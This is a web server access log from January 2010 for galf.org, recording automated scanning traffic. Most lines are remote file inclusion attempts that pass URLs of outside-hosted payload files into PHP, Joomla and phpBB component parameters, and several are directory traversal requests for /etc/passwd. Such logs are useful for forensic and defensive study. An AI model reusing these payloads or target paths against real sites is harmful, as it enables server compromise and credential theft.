203.255.228.8 - - [25/Jan/2010:05:07:06 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:06 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:06 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:12 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:49 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:49 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:49 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:54 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:59 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:59 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:07:59 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:08:06 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:08:39 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:08:39 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:08:40 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:08:44 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:05:09:04 -0800] "GET /logs/access_090720.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:05:09:42 -0800] "GET /logs/access_090720.log/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:16 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:16 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:17 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:21 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:35 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:35 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:35 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:05:11:39 -0800] "GET /logs/access_091116.log%20%20//includes/functions_portal.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [25/Jan/2010:05:13:24 -0800] "GET /logs/access_091228.log HTTP/1.0" 200 6435147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:05:19:17 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:05:19:17 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:05:19:17 -0800] "GET /logs/access_091207.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:19:57 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:19:57 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:19:57 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.23.212.146 - - [25/Jan/2010:05:22:07 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:24:08 -0800] "GET /com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:24:08 -0800] "GET /logs//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:24:08 -0800] "GET /logs/access.log%20%20//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
219.93.36.90 - - [25/Jan/2010:05:24:17 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:24:18 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:24:18 -0800] "GET /logs/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:24:18 -0800] "GET /phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:05:24:23 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:05:24:23 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:24:44 -0800] "GET /phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:24:44 -0800] "GET /logs/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:24:45 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:24:45 -0800] "GET //write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:24:45 -0800] "GET /logs/access.log///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:24:46 -0800] "GET /logs///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:05:25:02 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:25:04 -0800] "GET //write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:25:04 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:25:04 -0800] "GET /logs///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:25:32 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:26:15 -0800] "GET /logs/access_090817.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:26:15 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:26:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:26:59 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:27:31 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:27:31 -0800] "GET /logs///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:27:31 -0800] "GET //write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:28:20 -0800] "GET /administrator/bbs/write_comment_update.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:28:20 -0800] "GET /logs/access.log%20%20//administrator/bbs/write_comment_update.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:28:21 -0800] "GET /logs//administrator/bbs/write_comment_update.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:29 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:29 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:29 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:39 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:55 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:55 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:28:55 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:29:04 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:05:29:06 -0800] "GET /logs//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:29:07 -0800] "GET /com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [25/Jan/2010:05:29:07 -0800] "GET /logs/access.log%20%20//com_dbquery/compon/administrator/bbs/write_comment_update.php?board_skin_path=http://www.fileden.com/files/2010/1/18/2729554/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.14.226 - - [25/Jan/2010:05:29:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:29:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:30:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:30:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:05:34:12 -0800] "GET /logs//include.php?path[docroot]=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:05:34:12 -0800] "GET /include.php?path[docroot]=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:34:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
69.175.14.226 - - [25/Jan/2010:05:34:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
218.38.12.14 - - [25/Jan/2010:05:37:28 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:37:28 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:37:29 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:05:37:37 -0800] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:05:37:37 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:05:37:49 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.138.88.246 - - [25/Jan/2010:05:37:49 -0800] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:38:08 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:38:08 -0800] "GET /logs/access_090713.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:38:08 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:05:38:16 -0800] "GET /bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:05:38:16 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:05:38:16 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:38:51 -0800] "GET /logs/access_090713.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:38:51 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:05:38:52 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:39:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.175.14.226 - - [25/Jan/2010:05:39:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:05:39:40 -0800] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:05:39:40 -0800] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:39:57 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:39:57 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:39:57 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:41:08 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:41:08 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [25/Jan/2010:05:41:08 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:05:42:04 -0800] "GET /logs/access.log//?_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:05:42:04 -0800] "GET /?_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:05:42:04 -0800] "GET /logs//?_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:05:42:07 -0800] "GET /?_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:05:42:07 -0800] "GET /logs//?_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
143.248.146.168 - - [25/Jan/2010:05:42:07 -0800] "GET /logs/access.log//?_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.14.226 - - [25/Jan/2010:05:42:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
69.175.14.226 - - [25/Jan/2010:05:42:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://shop.billi-walker.jp/images/large/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
218.38.12.14 - - [25/Jan/2010:05:43:02 -0800] "GET /logs//administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:05:43:02 -0800] "GET /administrator/components/com_extcalendar/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
